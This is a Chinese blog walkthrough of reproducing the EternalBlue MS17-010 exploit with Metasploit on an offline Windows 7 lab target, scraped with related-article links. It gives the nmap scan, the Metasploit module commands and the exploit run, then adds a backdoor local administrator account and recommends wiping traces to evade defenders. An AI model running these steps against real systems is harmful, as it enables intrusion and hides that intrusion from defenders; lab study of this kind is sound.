使用Kali复现永恒之蓝
使用Kali复现永恒之蓝
本次实验为离线靶机测试
实验步骤
- 确认测试环境:在开始测试之前,需要确认测试环境是否符合要求。我使用的是一台运行Kali的测试机和一台运行Windows 7 64位的靶机。确保测试机和靶机之间可以进行网络通信。
 - 安装漏洞利用工具:永恒之蓝漏洞利用工具有很多种,常见的包括Metasploit、Empire、Fuzzbunch等。可以选择其中的一种工具,根据工具的安装和使用说明进行安装和配置。Kali自带Metasploit。
 - 扫描目标主机:在进行漏洞利用之前,需要先对目标主机进行扫描,以确定主机上是否存在漏洞。我使用nmap工具对目标主机进行扫描,找出目标主机上开放的端口和服务。
 - 利用漏洞攻击目标主机:在确定目标主机存在漏洞之后,可以使用之前安装的漏洞利用工具进行攻击。
 - 获取目标主机权限:如果漏洞利用成功,你将获得目标主机的权限。你可以使用相关命令或工具进一步探索目标主机的内部结构和信息,以确定主机上存储的敏感信息或其他攻击目标。
 - 清理痕迹:在完成攻击测试后,需要清理测试机和目标主机上留下的痕迹,以避免被安全防御人员或其他攻击者发现。你可以使用相关命令或工具删除测试机和目标主机上的痕迹。
 
1.确认测试环境
虚拟机
VMware 16.0
Kali 64位
Version:Linux version 6.1.0-kali5-amd64 (devel@kali.org) (gcc-12 (Debian 12.2.0-14) 12.2.0, GNU ld (GNU Binutils for Debian) 2.40) #1 SMP PREEMPT_DYNAMIC Debian 6.1.12-1kali2
 cat  /proc/version

IP:192.168.80.130/24 网关192.168.80.2
Windows7 64位
Version:Windows 7 旗舰版 [版本 6.1 7601]
 systeminfo或者winver

IP:192.168.80.140/24 (后面换了192.168.80.141/24) 网关192.168.80.2
PING

2.安装漏洞利用工具
Kali自带metasploit
3.扫描目标主机
kali扫描
 nmap -sS -O -T4 192.168.80.140

Nessus扫描


4.利用漏洞攻击目标主机
运行msfconsole
 msfconsole
报错

问一下Chatgpt
这个错误看起来像是Metasploit Framework的一个依赖文件找不到导致的。可能的原因有很多,例如文件损坏、文件权限问题或缺少依赖库等。
以下是一些可能的解决方法:
- 检查文件路径是否正确,确保文件存在于指定的位置。
 - 检查文件权限,确保文件可以被读取和执行。
 - 检查依赖库是否安装完整。你可以尝试更新并重新安装Metasploit Framework,以确保所有依赖库都已正确安装。
 - 如果以上方法都不起作用,可能需要重新安装Metasploit Framework并确保所有依赖库都正确安装。
 如果以上方法都不起作用,你可以考虑提交一个issue到Metasploit Framework的GitHub仓库中,向开发人员寻求帮助。
重装Metasploit Framework
 sudo apt-get remove metasploit-framework  ##卸载旧版
 sudo apt-get update       ##更新APT包列表
 sudo apt-get install metasploit-framework      ##重装
如果你想安装特定版本的Metasploit Framework,可以在命令后面添加版本号
 sudo apt-get install metasploit-framework=6.1.11-0kali1
 msfconsole -v               ##检查安装版本
 msfconsole                   ##启动

查找MS17-010漏洞模块
 search ms17-010

- 0 exploit/windows/smb/ms17_010_eternalblue:用于利用EternalBlue漏洞实现SMB远程代码执行。
 - 1 exploit/windows/smb/ms17_010_psexec:用于利用EternalRomance、EternalSynergy或EternalChampion漏洞实现SMB远程代码执行。
 - 2 auxiliary/admin/smb/ms17_010_command:用于利用EternalRomance、EternalSynergy或EternalChampion漏洞实现SMB远程命令执行。
 - 3 auxiliary/scanner/smb/smb_ms17_010:用于检测目标是否存在MS17-010漏洞。
 - 4 exploit/windows/smb/smb_doublepulsar_rce:用于利用DoublePulsar漏洞实现SMB远程代码执行。
 
选择检测模块
 use 3
查看模块具体信息
 info


查看需要设置选项
 show options

设置攻击目标IP
 set rhosts 192.168.80.140

执行模块攻击检测
 run

执行模块攻击
 search ms17-010                                    ##查找漏洞
 use 0                                                       ##选择模块
 set rhosts 192.168.80.140                       ##设置目标IP
 run                                                           ##攻击

报错:漏洞利用因失败而中止:无目标:此模块仅支持 x64(64 位)目标
永恒之蓝只能在64位系统上运行
更换Windows server 2008 R2 重来


系统不兼容,这个错误通常出现在目标主机的lsass服务崩溃导致SMB协商失败。这可能会导致目标主机在60秒后重新启动。这是由于漏洞利用的性质,可能会导致目标系统崩溃或意外关闭服务。你可以等待目标系统重新启动,然后再次尝试攻击,或者尝试使用其他利用方法或工具进行攻击。另外,确保你正在攻击正确的目标IP地址,并检查你的漏洞利用工具和payload是否与目标系统的架构和操作系统版本兼容。
换了个window server 2012
每次攻击到最后一步Server 2012就蓝屏,试了好多遍,还是蓝屏。。。
再换个重装的win7
成功
shell
chcp 65001     ##设置字符格式


5.获取目标权限
添加新用户和权限
net user 新用户名 密码  /add             ##添加新用户
net localgroup administrators 用户名  /add   ##添加管理员组权限

远程桌面登录

6.清理痕迹
略
参考博客https://blog.csdn.net/qq_44159028/article/details/104044002
使用Kali复现永恒之蓝的更多相关文章
- 利用metasploit复现永恒之蓝
		
环境 目标机器:windows 7 ,172.16.136.169 攻击机:安装了Metasploit 的 ubuntu16.04 ,172.16.136.130 (安装Metasploit:在 Ub ...
 - 【研究】ms17-010永恒之蓝漏洞复现
		
1 永恒之蓝漏洞复现(ms17-010) 1.1 漏洞描述: Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放44 ...
 - EternalBlue永恒之蓝漏洞复现
		
EternalBlue漏洞复现 1. 实训目的 永恒之蓝(EternalBlue)是由美国国家安全局开发的漏洞利用程序,对应微软漏洞编号ms17-010.该漏洞利用工具由一个名为”影子经济人”( ...
 - Metasploitable3学习笔记--永恒之蓝漏洞复现
		
漏洞描述: Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不 ...
 - 永恒之蓝MS17-010漏洞复现
		
永恒之蓝MS17-010漏洞复现 1.漏洞描述: 起因: 永恒之蓝(Eternalblue)是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包 ...
 - 永恒之蓝ms17_010漏洞复现
		
1.什么是永恒之蓝 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机. 2.SMB协议 SM ...
 - 永恒之蓝(MS17-010)漏洞复现
		
1. 漏洞介绍 永恒之蓝: 恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含"永恒之蓝"工具,"永恒之 ...
 - MS17-010漏洞复现(永恒之蓝)
		
0x01:温馨提示 微软已于2017 年 发布MS17-010补丁,修复了"永恒之蓝"攻击的系统漏洞,一定要及时更新Windows系统补丁. 本次只是简易的复现MS17-010,成 ...
 - 【漏洞复现】永恒之蓝 ms17-010 漏洞利用 攻击手法
		
日期:2018-07-21 21:09:16 介绍:永恒之蓝利用的 ms17-010 漏洞,拿 Shell.查看文件.获取密码. 0x01.实验环境 攻击机 系统:macOS Sierra 10.12 ...
 - PJzhang:ms17-010永恒之蓝漏洞在windows 2008R2中的复现
		
猫宁!!! 参考: https://www.anquanke.com/post/id/86245 https://xz.aliyun.com/t/2536 https://www.cnblogs.co ...
 
随机推荐
- 量化交易——MACD是什么,用python来验证交易时把它作为买卖信号到底靠不靠谱
			
在我刚开始学习股票的时候,是跟着b站上的视频学习的,当讲到macd的时候,up主反复强调macd是指标之王,股票里面有那么多的指标,但是却只有macd被称为指标之王,当macd出现金叉的时候,预示着股 ...
 - std::ref
			
The std::thread constructor copies the supplied values, without converting to the expected argument ...
 - 【python】第二模块 步骤一 第三课、数据库的基本查询
			
第三课.数据库的基本查询 一.课程介绍 1.1 课程介绍 学习目标 数据的简单查询 无条件查询记录,字段的计算和字段的别名 数据的高级查询 数据排序.分页.去除重复记录 数据的有条件查询 条件表达式: ...
 - SpringCloud框架开发
			
1.是什么微服务 是一种架构模式,他提倡将单一应用程序划分一组小的服务,服务之间的相互配合.互相协调. 2.Spring Cloud简介 SpringClound等于分布式微服务架构的一站式解决方案, ...
 - input设置自定义属性,并获取值。
			
HTML代码: JavaScript代码: 因为busCode不是input标签原生的属性,所以不能使用"点"操作. 非标准属性,要用:obj.getAttribute(" ...
 - [jmeter的使用]jmeter上传文件接口的写法
			
1.类型和参数名称,依据接口/抓的包决定 2.必须选择java否则报错 3.http header也要写
 - 关于ADB命令工具
			
android提供了不少命令行工具,方便我们调试和查看信息.下面是frameworks/base/cmds(android 6.0.1)中的命令. $ tree cmds -L 1 cmds am├─ ...
 - SQL Server获取连接的IP地址
			
来源:http://www.itpub.net/thread-193247-1-1.html 先保存,以后研究一下 1 *--获取连接SQL服务器的信息 2 3 所有连接本机的:操作的数据库名,计算机 ...
 - 使用阿里云镜像安装tensorflow
			
pip --default-timeout=1000 install --index-url https://mirrors.aliyun.com/pypi/simple tensorflow pip ...
 - 深入理解css 笔记(完)
			
一个网站,从看起来还可以,到看起来非常棒,差别在于细节.在实现了页面里 某个组件的布局并写完样式之后,不要急着继续,有意识地训练自己,以挑剔的眼光审视刚刚完成的代码.如果增加或者减少一点内边距是不是看 ...